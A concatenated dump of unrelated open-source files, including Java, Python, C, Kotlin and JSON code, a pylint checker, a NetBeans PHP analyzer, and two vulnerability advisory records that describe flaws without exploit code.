// XSpreadsheet xSpreadsheet = (XSpreadsheet)UnoRuntime.queryInterface(
// XSpreadsheet.class, sheet);
// XCell xCell = xSpreadsheet.getCellByPosition(0, 0);
// xCell.setValue(21);
// xCell = xSpreadsheet.getCellByPosition(0, 1);
// xCell.setValue(21);
// xCell = xSpreadsheet.getCellByPosition(0, 2);
// xCell.setFormula("=sum(A1:A2)");
// XPropertySet xCellProps = (XPropertySet)UnoRuntime.queryInterface(
// XPropertySet.class, xCell);
// xCellProps.setPropertyValue("CellStyle", "Result");
// XModel xSpreadsheetModel = (XModel)UnoRuntime.queryInterface(
// XModel.class, xSpreadsheetComponent);
// XController xSpreadsheetController = xSpreadsheetModel.getCurrentController();
// XSpreadsheetView xSpreadsheetView = (XSpreadsheetView)
// UnoRuntime.queryInterface(XSpreadsheetView.class,
// xSpreadsheetController);
// xSpreadsheetView.setActiveSheet(xSpreadsheet);
// // *********************************************************
// // example for use of enum types
// xCellProps.setPropertyValue("VertJustify",
// com.sun.star.table.CellVertJustify.TOP);
// // *********************************************************
// // example for a sequence of PropertyValue structs
// // create an array with one PropertyValue struct, it contains
// // references only
// loadProps = new PropertyValue[1];
// // instantiate PropertyValue struct and set its member fields
// PropertyValue asTemplate = new PropertyValue();
// asTemplate.Name = "AsTemplate";
// asTemplate.Value = new Boolean(true);
// // assign PropertyValue struct to array of references for PropertyValue
// // structs
// loadProps[0] = asTemplate;
// // load calc file as template
// //xSpreadsheetComponent = xComponentLoader.loadComponentFromURL(
// // "file:///c:/temp/DataAnalysys.ods", "_blank", 0, loadProps);
// // *********************************************************
// // example for use of XEnumerationAccess
// XCellRangesQuery xCellQuery = (XCellRangesQuery)
// UnoRuntime.queryInterface(XCellRangesQuery.class, sheet);
// XSheetCellRanges xFormulaCells = xCellQuery.queryContentCells(
// (short)com.sun.star.sheet.CellFlags.FORMULA);
// XEnumerationAccess xFormulas = xFormulaCells.getCells();
// XEnumeration xFormulaEnum = xFormulas.createEnumeration();
// while (xFormulaEnum.hasMoreElements()) {
// Object formulaCell = xFormulaEnum.nextElement();
// xCell = (XCell)UnoRuntime.queryInterface(XCell.class, formulaCell);
// XCellAddressable xCellAddress = (XCellAddressable)
// UnoRuntime.queryInterface(XCellAddressable.class, xCell);
// System.out.println("Formula cell in column " +
// xCellAddress.getCellAddress().Column
// + ", row " + xCellAddress.getCellAddress().Row
// + " contains " + xCell.getFormula());
// }
// }
// catch( com.sun.star.lang.DisposedException e ) { //works from Patch 1
// xRemoteContext = null;
// throw e;
// }
// }
// }
| 6,086 |
380 | <filename>Java/Algorithms/Math/CelToFh.java
class CelToFh{
public static void main(String[] args) {
int cel = 32;
System.out.println((int)(cel*(1.8))+32);
}
} | 71 |
826 | <reponame>zwh930712/densenet.pytorch
# From https://gist.github.com/apaszke/01aae7a0494c55af6242f06fad1f8b70
from graphviz import Digraph
from torch.autograd import Variable
def save(fname, creator):
dot = Digraph(comment='LRP',
node_attr={'style': 'filled', 'shape': 'box'})
#, 'fillcolor': 'lightblue'})
seen = set()
def add_nodes(var):
if var not in seen:
if isinstance(var, Variable):
dot.node(str(id(var)), str(var.size()), fillcolor='lightblue')
else:
dot.node(str(id(var)), type(var).__name__)
seen.add(var)
if hasattr(var, 'previous_functions'):
for u in var.previous_functions:
dot.edge(str(id(u[0])), str(id(var)))
add_nodes(u[0])
add_nodes(creator)
dot.save(fname)
| 448 |
678 | /* struct::tree - critcl - layer 1 declarations
* (a) Data structures.
*/
#ifndef _DS_H
#define _DS_H 1
#include "tcl.h"
/* Forward declarations of references to trees & nodes.
*/
typedef struct T* TPtr;
typedef struct TN* TNPtr;
/* Node structure.
*/
typedef struct TN {
/* Node identity / handle */
/* Internal rep should be of type */
/* 'tcllib::struct::tree/critcl::node'. */
/* See below. */
Tcl_Obj* name;
Tcl_HashEntry* he;
/* Basic linkage of node to its tree */
TPtr tree; /* Tree the node belongs to */
TNPtr nextleaf; /* Double linked list of all */
TNPtr prevleaf; /* leaf nodes */
TNPtr nextnode; /* Double linked list of all */
TNPtr prevnode; /* nodes */
/* Node navigation. Parent/Children/Siblings */
TNPtr parent; /* Parent node */
TNPtr* child; /* Array of children. Can
* be NULL. leaf node implies
* NULL, and vice versa */
int nchildren; /* # nodes used in previous array */
int maxchildren; /* Size of previous array */
TNPtr left; /* Sibling to the left, NULL if no such */
TNPtr right; /* Sibling to the right, NULL if no such */
/* Node attributes */
Tcl_HashTable* attr; /* Node attributes. NULL if the
* node has none */
/* Cache for properties of the node based on the tree
* structure
*/
int index; /* Index of node in 'child' array of its
* parent */
int depth; /* Distance to root node.
* 0 <=> root */
int height; /* Distance to deepest child.
* 0 <=> Leaf. */
int desc; /* #Descendants */
} TN;
/* Tree structure
*/
typedef struct T {
Tcl_Command cmd; /* Token of the object command for
* the tree */
Tcl_HashTable node; /* Mapping
* Node names -> Node structure */
int counter; /* Counter used by the generator
* of node names */
TN* root; /* Root node of the tree. */
TN* leaves; /* List of all leaf nodes */
int nleaves; /* List length */
TN* nodes; /* List of all nodes */
int nnodes; /* List length */
int structure; /* Boolean flag. Set to true if the
* depth/height/desc information
* in the nodes is valid. Reset to
* false by all operations changing
* the structure of the tree. */
/* Generation of node handles. Tree local storage, makes code thread
* oblivious.
*/
char handle [50];
} T;
#endif /* _DS_H */
/*
* Local Variables:
* mode: c
* c-basic-offset: 4
* fill-column: 78
* End:
*/
| 909 |
720 | <reponame>stephanenicolas/dependency-analysis-android-gradle-plugin
package com.seattleshelter.core.di;
import java.lang.System;
@kotlin.Metadata(mv = {1, 1, 15}, bv = {1, 0, 3}, k = 1, d1 = {"\u0000\n\n\u0002\u0018\u0002\n\u0002\u0010\u001b\n\u0000\b\u0087\u0002\u0018\u00002\u00020\u0001B\u0000\u00a8\u0006\u0002"}, d2 = {"Lcom/seattleshelter/core/di/Id;", "", "core_debug"})
@java.lang.annotation.Target(value = {java.lang.annotation.ElementType.METHOD, java.lang.annotation.ElementType.PARAMETER})
@java.lang.annotation.Retention(value = java.lang.annotation.RetentionPolicy.RUNTIME)
@kotlin.annotation.Retention(value = kotlin.annotation.AnnotationRetention.RUNTIME)
@kotlin.annotation.Target(allowedTargets = {kotlin.annotation.AnnotationTarget.FUNCTION, kotlin.annotation.AnnotationTarget.VALUE_PARAMETER})
@javax.inject.Qualifier()
public abstract @interface Id {
} | 356 |
832 | <filename>app/src/main/assets/api/superman_vs_batman/gallery/3.json<gh_stars>100-1000
[
{
"image": "http://batmanvsuperman.dccomics.com/images/gallery/img21.jpg"
},
{
"image": "http://batmanvsuperman.dccomics.com/images/gallery/img22.jpg"
}
] | 112 |
689 | """Anomaly Map Generator for the STFPM model implementation."""
# Copyright (C) 2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions
# and limitations under the License.
from typing import Dict, Tuple, Union
import torch
import torch.nn.functional as F
from omegaconf import ListConfig
from torch import Tensor
class AnomalyMapGenerator:
"""Generate Anomaly Heatmap."""
def __init__(
self,
image_size: Union[ListConfig, Tuple],
):
self.distance = torch.nn.PairwiseDistance(p=2, keepdim=True)
self.image_size = image_size if isinstance(image_size, tuple) else tuple(image_size)
def compute_layer_map(self, teacher_features: Tensor, student_features: Tensor) -> Tensor:
"""Compute the layer map based on cosine similarity.
Args:
teacher_features (Tensor): Teacher features
student_features (Tensor): Student features
Returns:
Anomaly score based on cosine similarity.
"""
norm_teacher_features = F.normalize(teacher_features)
norm_student_features = F.normalize(student_features)
layer_map = 0.5 * torch.norm(norm_teacher_features - norm_student_features, p=2, dim=-3, keepdim=True) ** 2
layer_map = F.interpolate(layer_map, size=self.image_size, align_corners=False, mode="bilinear")
return layer_map
def compute_anomaly_map(
self, teacher_features: Dict[str, Tensor], student_features: Dict[str, Tensor]
) -> torch.Tensor:
"""Compute the overall anomaly map via element-wise production the interpolated anomaly maps.
Args:
teacher_features (Dict[str, Tensor]): Teacher features
student_features (Dict[str, Tensor]): Student features
Returns:
Final anomaly map
"""
batch_size = list(teacher_features.values())[0].shape[0]
anomaly_map = torch.ones(batch_size, 1, self.image_size[0], self.image_size[1])
for layer in teacher_features.keys():
layer_map = self.compute_layer_map(teacher_features[layer], student_features[layer])
anomaly_map = anomaly_map.to(layer_map.device)
anomaly_map *= layer_map
return anomaly_map
def __call__(self, **kwds: Dict[str, Tensor]) -> torch.Tensor:
"""Returns anomaly map.
Expects `teach_features` and `student_features` keywords to be passed explicitly.
Example:
>>> anomaly_map_generator = AnomalyMapGenerator(image_size=tuple(hparams.model.input_size))
>>> output = self.anomaly_map_generator(
teacher_features=teacher_features,
student_features=student_features
)
Raises:
ValueError: `teach_features` and `student_features` keys are not found
Returns:
torch.Tensor: anomaly map
"""
if not ("teacher_features" in kwds and "student_features" in kwds):
raise ValueError(f"Expected keys `teacher_features` and `student_features. Found {kwds.keys()}")
teacher_features: Dict[str, Tensor] = kwds["teacher_features"]
student_features: Dict[str, Tensor] = kwds["student_features"]
return self.compute_anomaly_map(teacher_features, student_features)
| 1,439 |
3,102 | <filename>clang/test/Analysis/Inputs/system-header-simulator-for-nullability-cxx.h
#pragma clang system_header
struct S {
~S(){}
};
void foo() {
S s;
}
| 66 |
1,111 | <reponame>immujahidkhan/Android-ActionItemBadge
package com.mikepenz.actionitembadge.library.utils;
import android.annotation.SuppressLint;
import android.content.Context;
import android.graphics.drawable.Drawable;
import android.view.View;
import static android.util.TypedValue.COMPLEX_UNIT_DIP;
import static android.util.TypedValue.applyDimension;
/**
* Created by mikepenz on 02.07.15.
*/
public class UIUtil {
/**
* helper method to set the background depending on the android version
*
* @param v
* @param d
*/
@SuppressLint("NewApi")
public static void setBackground(View v, Drawable d) {
if (android.os.Build.VERSION.SDK_INT < android.os.Build.VERSION_CODES.JELLY_BEAN) {
v.setBackgroundDrawable(d);
} else {
v.setBackground(d);
}
}
public static int convertDpToPx(Context context, float dp) {
return (int) applyDimension(COMPLEX_UNIT_DIP, dp, context.getResources().getDisplayMetrics());
}
}
| 401 |
411 | <gh_stars>100-1000
"""
Migration for the Submitty system.
adds submitty admin json
"""
from pathlib import Path
import shutil
import json
import os
def up(config):
submitty_admin_filename = str(Path(config.submitty['submitty_install_dir'], 'config', 'submitty_admin.json'))
if not os.path.isfile(submitty_admin_filename):
submitty_admin_json = {
'submitty_admin_username': '',
'submitty_admin_password': ''
}
with open(submitty_admin_filename,'w') as open_file:
json.dump(submitty_admin_json, open_file, indent=2)
shutil.chown(submitty_admin_filename, 'root', 'submitty_daemon')
os.chmod(submitty_admin_filename, 0o440)
def down(config):
pass
| 318 |
348 | <gh_stars>100-1000
{"nom":"Saint-Gervais-la-Forêt","circ":"1ère circonscription","dpt":"Loir-et-Cher","inscrits":2649,"abs":1241,"votants":1408,"blancs":11,"nuls":10,"exp":1387,"res":[{"nuance":"MDM","nom":"<NAME>","voix":555},{"nuance":"SOC","nom":"M. <NAME>","voix":185},{"nuance":"FI","nom":"Mme <NAME>","voix":160},{"nuance":"LR","nom":"<NAME>","voix":157},{"nuance":"FN","nom":"M. <NAME>","voix":145},{"nuance":"DVD","nom":"Mme <NAME>","voix":61},{"nuance":"COM","nom":"Mme <NAME>","voix":46},{"nuance":"ECO","nom":"M. <NAME>","voix":34},{"nuance":"ECO","nom":"M. <NAME>","voix":23},{"nuance":"EXG","nom":"Mme <NAME>","voix":11},{"nuance":"DIV","nom":"M. <NAME>","voix":10}]} | 280 |
405 | <gh_stars>100-1000
from .australia import (
Australia,
AustralianCapitalTerritory,
NewSouthWales,
NorthernTerritory,
Queensland,
SouthAustralia,
Tasmania,
Hobart,
Victoria,
WesternAustralia
)
from .marshall_islands import MarshallIslands
from .new_zealand import NewZealand
__all__ = (
# Australia and al.
'Australia',
'AustralianCapitalTerritory',
'NewSouthWales',
'NorthernTerritory',
'Queensland',
'SouthAustralia',
'Tasmania',
'Hobart',
'Victoria',
'WesternAustralia',
# Other oceanian countries
'MarshallIslands',
'NewZealand',
)
| 253 |
892 | {
"schema_version": "1.2.0",
"id": "GHSA-p4fq-7p56-g8v4",
"modified": "2022-05-01T17:41:38Z",
"published": "2022-05-01T17:41:38Z",
"aliases": [
"CVE-2007-0083"
],
"details": "Cross-site scripting (XSS) vulnerability in Nuked Klan 1.7 and earlier allows remote attackers to inject arbitrary web script or HTML via a javascript: URI in a getURL statement in a .swf file, as demonstrated by \"Remote Cookie Disclosure.\" NOTE: it could be argued that this is an issue in Shockwave instead of Nuked Klan.",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2007-0083"
},
{
"type": "WEB",
"url": "http://osvdb.org/33368"
},
{
"type": "WEB",
"url": "http://securityreason.com/securityalert/2101"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/archive/1/455726/100/0/threaded"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/21850"
}
],
"database_specific": {
"cwe_ids": [
],
"severity": "MODERATE",
"github_reviewed": false
}
} | 514 |
1,248 | {
"name": "replicatedFrom",
"typeName": "array<AtlasServer>",
"cardinality": "SET",
"isIndexable": false,
"isOptional": true,
"isUnique": false,
"options": {
"isSoftReference": "true"
}
}
| 84 |
892 | {
"schema_version": "1.2.0",
"id": "GHSA-7vw4-jppr-mcc9",
"modified": "2022-05-01T07:22:34Z",
"published": "2022-05-01T07:22:34Z",
"aliases": [
"CVE-2006-4865"
],
"details": "<NAME> PhpQuiz allows remote attackers to obtain sensitive information via a direct request to cfgphpquiz/install.php and other unspecified vectors.",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2006-4865"
},
{
"type": "WEB",
"url": "http://securityreason.com/securityalert/1604"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/archive/1/446112/100/0/threaded"
}
],
"database_specific": {
"cwe_ids": [
],
"severity": "MODERATE",
"github_reviewed": false
}
} | 379 |
335 | <reponame>Safal08/Hacktoberfest-1<gh_stars>100-1000
{
"word": "Vair",
"definitions": [
"Fur obtained from a variety of red squirrel, used in the 13th and 14th centuries as a trimming or lining for garments.",
"Fur represented by interlocking rows of shield-shaped or bell-shaped figures which are typically alternately blue and white, as a tincture."
],
"parts-of-speech": "Noun"
} | 145 |
1,463 | <reponame>aaye/OpenSubdiv
//
// Copyright 2013 Pixar
//
// Licensed under the Apache License, Version 2.0 (the "Apache License")
// with the following modification; you may not use this file except in
// compliance with the Apache License and the following modification to it:
// Section 6. Trademarks. is deleted and replaced with:
//
// 6. Trademarks. This License does not grant permission to use the trade
// names, trademarks, service marks, or product names of the Licensor
// and its affiliates, except as required to comply with Section 4(c) of
// the License and to reproduce the content of the NOTICE file.
//
// You may obtain a copy of the Apache License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the Apache License with the above modification is
// distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the Apache License for the specific
// language governing permissions and limitations under the Apache License.
//
static const std::string catmark_gregory_test5 =
"v -1.356808 -0.083528 1.425768\n"
"v 0.019224 -1.134152 1.314912\n"
"v -0.796312 -0.701552 2.527352\n"
"v -1.272248 -0.262936 0.526768\n"
"v -0.355528 -0.399336 -1.325872\n"
"v 0.728824 -0.419232 1.251256\n"
"v 0.595688 -0.416328 0.744344\n"
"v -0.245000 -0.965184 0.623632\n"
"v -0.030728 -0.345264 0.519104\n"
"v 0.391584 -0.345768 0.611264\n"
"v -0.354248 -0.847304 -0.035960\n"
"v 0.591456 -0.431424 0.343048\n"
"v -0.683168 -0.681144 0.361080\n"
"v 0.015632 -0.691216 -0.980472\n"
"v 0.754360 -0.387264 -0.665952\n"
"v -0.121000 -0.535808 -1.348384\n"
"v -0.150464 -0.413896 0.236536\n"
"v -1.068432 -0.389648 -0.244392\n"
"v -0.628200 -0.670280 0.103376\n"
"v 0.472696 -0.352880 0.412584\n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vt 0 0 \n"
"vn -0.598314 -0.016294 0.801096\n"
"vn -0.091008 -0.181684 0.979137\n"
"vn -0.598314 -0.016294 0.801096\n"
"vn -0.583785 -0.026634 0.811471\n"
"vn -0.452613 -0.260227 0.852891\n"
"vn 0.608152 -0.306705 0.732177\n"
"vn 0.541220 -0.545713 0.639748\n"
"vn -0.005690 -0.537551 0.843212\n"
"vn 0.287651 -0.459659 0.840221\n"
"vn 0.233994 -0.625569 0.744252\n"
"vn -0.089072 0.238062 0.967157\n"
"vn 0.164711 0.473793 0.865096\n"
"vn -0.264037 -0.175309 0.948447\n"
"vn -0.129696 -0.168466 0.977138\n"
"vn 0.388886 0.011631 0.921212\n"
"vn -0.452613 -0.260227 0.852891\n"
"vn 0.155237 0.498054 0.853137\n"
"vn -0.501269 -0.167537 0.848917\n"
"vn -0.228587 0.075152 0.970618\n"
"vn -0.078590 0.612564 0.786504\n"
"s off\n"
"f 13/13/13 9/9/9 8/8/8\n"
"f 11/11/11 17/17/17 19/19/19\n"
"f 11/11/11 12/12/12 20/20/20 17/17/17\n"
"f 7/7/7 6/6/6 2/2/2 8/8/8\n"
"f 9/9/9 10/10/10 7/7/7 8/8/8\n"
"f 14/14/14 15/15/15 12/12/12 11/11/11\n"
"f 18/18/18 5/5/5 16/16/16 14/14/14 11/11/11 19/19/19\n"
"f 2/2/2 3/3/3 1/1/1 4/4/4 13/13/13 8/8/8\n"
"f 4/4/4 18/18/18 19/19/19 13/13/13\n"
"f 17/17/17 20/20/20 10/10/10 9/9/9\n"
"f 19/19/19 17/17/17 9/9/9 13/13/13\n"
"\n"
;
| 1,681 |
852 | <filename>Configuration/Eras/python/Modifier_phase2_GE0_cff.py
import FWCore.ParameterSet.Config as cms
phase2_GE0 = cms.Modifier()
| 51 |
310 | <gh_stars>100-1000
{
"name": "<NAME>",
"description": "A 3D rendering and animation tool.",
"url": "https://www.daz3d.com/get_studio"
}
| 58 |
1,056 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.netbeans.modules.php.analysis;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.Map;
import java.util.concurrent.atomic.AtomicBoolean;
import java.util.logging.Level;
import java.util.logging.Logger;
import java.util.prefs.Preferences;
import org.netbeans.api.annotations.common.CheckForNull;
import org.netbeans.api.annotations.common.StaticResource;
import org.netbeans.api.fileinfo.NonRecursiveFolder;
import org.netbeans.modules.analysis.spi.Analyzer;
import org.netbeans.modules.php.analysis.commands.CodingStandardsFixer;
import org.netbeans.modules.php.analysis.options.AnalysisOptions;
import org.netbeans.modules.php.analysis.ui.analyzer.CodingStandardsFixerCustomizerPanel;
import org.netbeans.modules.php.analysis.util.AnalysisUtils;
import org.netbeans.modules.php.analysis.util.Mappers;
import org.netbeans.modules.php.api.executable.InvalidPhpExecutableException;
import org.netbeans.modules.php.api.util.StringUtils;
import org.netbeans.modules.refactoring.api.Scope;
import org.netbeans.spi.editor.hints.ErrorDescription;
import org.openide.filesystems.FileObject;
import org.openide.util.NbBundle;
import org.openide.util.lookup.ServiceProvider;
public final class CodingStandardsFixerAnalyzerImpl implements Analyzer {
private static final Logger LOGGER = Logger.getLogger(CodingStandardsFixerAnalyzerImpl.class.getName());
private final Context context;
private final AtomicBoolean cancelled = new AtomicBoolean();
public CodingStandardsFixerAnalyzerImpl(Context context) {
this.context = context;
}
@NbBundle.Messages({
"CodingStandardsFixerAnalyzerImpl.codingStandardsFixer.error=Coding Standards Fixer is not valid",
"CodingStandardsFixerAnalyzerImpl.codingStandardsFixer.error.description=Invalid coding standards fixer set in IDE Options.",
})
@Override
public Iterable<? extends ErrorDescription> analyze() {
Preferences settings = context.getSettings();
if (settings != null && !settings.getBoolean(CodingStandardsFixerCustomizerPanel.ENABLED, false)) {
return Collections.emptyList();
}
CodingStandardsFixer codingStandardsFixer = getValidCodingStandardsFixer();
if (codingStandardsFixer == null) {
context.reportAnalysisProblem(
Bundle.CodingStandardsFixerAnalyzerImpl_codingStandardsFixer_error(),
Bundle.CodingStandardsFixerAnalyzerImpl_codingStandardsFixer_error_description());
return Collections.emptyList();
}
String version = getValidCodingStandardsFixerVersion();
String level = getValidCodingStandardsFixerLevel();
String config = getValidCodingStandardsFixerConfig();
String options = getValidCodingStandardsFixerOptions();
CodingStandardsFixerParams codingStandardsFixerParams = new CodingStandardsFixerParams()
.setVersion(version)
.setLevel(level)
.setConfig(config)
.setOptions(options);
Scope scope = context.getScope();
Map<FileObject, Integer> fileCount = AnalysisUtils.countPhpFiles(scope);
int totalCount = 0;
for (Integer count : fileCount.values()) {
totalCount += count;
}
context.start(totalCount);
try {
return doAnalyze(scope, codingStandardsFixer, codingStandardsFixerParams, fileCount);
} finally {
context.finish();
}
}
@Override
public boolean cancel() {
cancelled.set(true);
// XXX cancel coding standards fixer?
return true;
}
@NbBundle.Messages({
"CodingStandardsFixerAnalyzerImpl.analyze.error=Coding standards fixer analysis error",
"CodingStandardsFixerAnalyzerImpl.analyze.error.description=Error occurred during coding standards fixer analysis, review Output window for more information.",
})
private Iterable<? extends ErrorDescription> doAnalyze(Scope scope, CodingStandardsFixer codingStandardsFixer,
CodingStandardsFixerParams params, Map<FileObject, Integer> fileCount) {
List<ErrorDescription> errors = new ArrayList<>();
int progress = 0;
codingStandardsFixer.startAnalyzeGroup();
for (FileObject root : scope.getSourceRoots()) {
if (cancelled.get()) {
return Collections.emptyList();
}
List<org.netbeans.modules.php.analysis.results.Result> results = codingStandardsFixer.analyze(params, root);
if (results == null) {
context.reportAnalysisProblem(
Bundle.CodingStandardsFixerAnalyzerImpl_analyze_error(),
Bundle.CodingStandardsFixerAnalyzerImpl_analyze_error_description());
return Collections.emptyList();
}
errors.addAll(Mappers.map(results));
progress += fileCount.get(root);
context.progress(progress);
}
for (FileObject file : scope.getFiles()) {
if (cancelled.get()) {
return Collections.emptyList();
}
List<org.netbeans.modules.php.analysis.results.Result> results = codingStandardsFixer.analyze(params, file);
if (results == null) {
context.reportAnalysisProblem(
Bundle.CodingStandardsFixerAnalyzerImpl_analyze_error(),
Bundle.CodingStandardsFixerAnalyzerImpl_analyze_error_description());
return Collections.emptyList();
}
errors.addAll(Mappers.map(results));
progress += fileCount.get(file);
context.progress(progress);
}
for (NonRecursiveFolder nonRecursiveFolder : scope.getFolders()) {
if (cancelled.get()) {
return Collections.emptyList();
}
FileObject folder = nonRecursiveFolder.getFolder();
List<org.netbeans.modules.php.analysis.results.Result> results = codingStandardsFixer.analyze(params, folder);
if (results == null) {
context.reportAnalysisProblem(
Bundle.CodingStandardsFixerAnalyzerImpl_analyze_error(),
Bundle.CodingStandardsFixerAnalyzerImpl_analyze_error_description());
return Collections.emptyList();
}
errors.addAll(Mappers.map(results));
progress += fileCount.get(folder);
context.progress(progress);
}
return errors;
}
@CheckForNull
private CodingStandardsFixer getValidCodingStandardsFixer() {
Preferences settings = context.getSettings();
String codingStandardsFixerPath = null;
if (settings != null) {
codingStandardsFixerPath = settings.get(CodingStandardsFixerCustomizerPanel.PATH, null);
}
try {
if (StringUtils.hasText(codingStandardsFixerPath)) {
return CodingStandardsFixer.getCustom(codingStandardsFixerPath);
}
return CodingStandardsFixer.getDefault();
} catch (InvalidPhpExecutableException ex) {
LOGGER.log(Level.INFO, null, ex);
}
return null;
}
private String getValidCodingStandardsFixerVersion() {
String codingStandardsFixerVersion = null;
Preferences settings = context.getSettings();
if (settings != null) {
codingStandardsFixerVersion = settings.get(CodingStandardsFixerCustomizerPanel.VERSION, null);
}
if (codingStandardsFixerVersion == null) {
codingStandardsFixerVersion = AnalysisOptions.getInstance().getCodingStandardsFixerVersion();
}
assert codingStandardsFixerVersion != null;
return codingStandardsFixerVersion;
}
@CheckForNull
private String getValidCodingStandardsFixerLevel() {
String codingStandardsFixerLevel = null;
Preferences settings = context.getSettings();
if (settings != null) {
codingStandardsFixerLevel = settings.get(CodingStandardsFixerCustomizerPanel.LEVEL, null);
}
if (codingStandardsFixerLevel == null) {
codingStandardsFixerLevel = AnalysisOptions.getInstance().getCodingStandardsFixerLevel();
}
assert codingStandardsFixerLevel != null;
return codingStandardsFixerLevel;
}
@CheckForNull
private String getValidCodingStandardsFixerConfig() {
String codingStandardsFixerConfig = null;
Preferences settings = context.getSettings();
if (settings != null) {
codingStandardsFixerConfig = settings.get(CodingStandardsFixerCustomizerPanel.CONFIG, null);
}
if (codingStandardsFixerConfig == null) {
codingStandardsFixerConfig = AnalysisOptions.getInstance().getCodingStandardsFixerConfig();
}
assert codingStandardsFixerConfig != null;
return codingStandardsFixerConfig;
}
@CheckForNull
private String getValidCodingStandardsFixerOptions() {
String codingStandardsFixerOptions = null;
Preferences settings = context.getSettings();
if (settings != null) {
codingStandardsFixerOptions = settings.get(CodingStandardsFixerCustomizerPanel.OPTIONS, null);
}
if (codingStandardsFixerOptions == null) {
codingStandardsFixerOptions = AnalysisOptions.getInstance().getCodingStandardsFixerOptions();
}
assert codingStandardsFixerOptions != null;
return codingStandardsFixerOptions;
}
//~ Inner class
@ServiceProvider(service = AnalyzerFactory.class)
public static final class CodingStandardsFixerAnalyzerFactory extends AnalyzerFactory {
@StaticResource
private static final String ICON_PATH = "org/netbeans/modules/php/analysis/ui/resources/coding-standards-fixer.png"; // NOI18N
@NbBundle.Messages("CodingStandardsFixerAnalyzerFactory.displayName=Coding Standards Fixer")
public CodingStandardsFixerAnalyzerFactory() {
super("PhpCodingStandardsFixer", Bundle.CodingStandardsFixerAnalyzerFactory_displayName(), ICON_PATH);
}
@Override
public Iterable<? extends WarningDescription> getWarnings() {
return Collections.emptyList();
}
@Override
public CustomizerProvider<Void, CodingStandardsFixerCustomizerPanel> getCustomizerProvider() {
return new CustomizerProvider<Void, CodingStandardsFixerCustomizerPanel>() {
@Override
public Void initialize() {
return null;
}
@Override
public CodingStandardsFixerCustomizerPanel createComponent(CustomizerContext<Void, CodingStandardsFixerCustomizerPanel> context) {
return new CodingStandardsFixerCustomizerPanel(context);
}
};
}
@Override
public Analyzer createAnalyzer(Context context) {
return new CodingStandardsFixerAnalyzerImpl(context);
}
}
}
| 4,700 |
463 | <gh_stars>100-1000
# Copyright (c) 2021 <NAME> <<EMAIL>>
# Copyright (c) 2021 <NAME> <<EMAIL>>
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/master/LICENSE
import astroid
from pylint.checkers import BaseChecker
from pylint.checkers.utils import check_messages
from pylint.interfaces import IAstroidChecker
from pylint.lint import PyLinter
class ConfusingConsecutiveElifChecker(BaseChecker):
"""Checks if "elif" is used right after an indented block that finishes with "if" or "elif" itself."""
__implements__ = IAstroidChecker
name = "confusing-elif-checker"
priority = -1
msgs = {
"R5601": (
"Consecutive elif with differing indentation level, consider creating a function to separate the inner elif",
"confusing-consecutive-elif",
"Used when an elif statement follows right after an indented block which itself ends with if or elif. "
"It may not be ovious if the elif statement was willingly or mistakenly unindented. "
"Extracting the indented if statement into a separate function might avoid confusion and prevent errors.",
)
}
@check_messages("confusing-consecutive-elif")
def visit_if(self, node: astroid.If):
body_ends_with_if = isinstance(
node.body[-1], astroid.If
) and self._has_no_else_clause(node.body[-1])
if node.has_elif_block() and body_ends_with_if:
self.add_message("confusing-consecutive-elif", node=node.orelse[0])
@staticmethod
def _has_no_else_clause(node: astroid.If):
orelse = node.orelse
while orelse and isinstance(orelse[0], astroid.If):
orelse = orelse[0].orelse
if not orelse or isinstance(orelse[0], astroid.If):
return True
return False
def register(linter: PyLinter):
"""This required method auto registers the checker.
:param linter: The linter to register the checker to.
:type linter: pylint.lint.PyLinter
"""
linter.register_checker(ConfusingConsecutiveElifChecker(linter))
| 858 |
7,158 | // This file is part of OpenCV project.
// It is subject to the license terms in the LICENSE file found in the top-level directory
// of this distribution and at http://opencv.org/license.html.
#include "test_precomp.hpp"
static
void initTrackingTests()
{
const char* extraTestDataPath =
#ifdef WINRT
NULL;
#else
getenv("OPENCV_DNN_TEST_DATA_PATH");
#endif
if (extraTestDataPath)
cvtest::addDataSearchPath(extraTestDataPath);
cvtest::addDataSearchSubDirectory(""); // override "cv" prefix below to access without "../dnn" hacks
}
CV_TEST_MAIN("cv", initTrackingTests())
| 219 |
12,278 | <filename>libs/coroutine/performance/cycle_i386.hpp
// Copyright <NAME> 2009.
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
#ifndef CYCLE_I386_H
#define CYCLE_I386_H
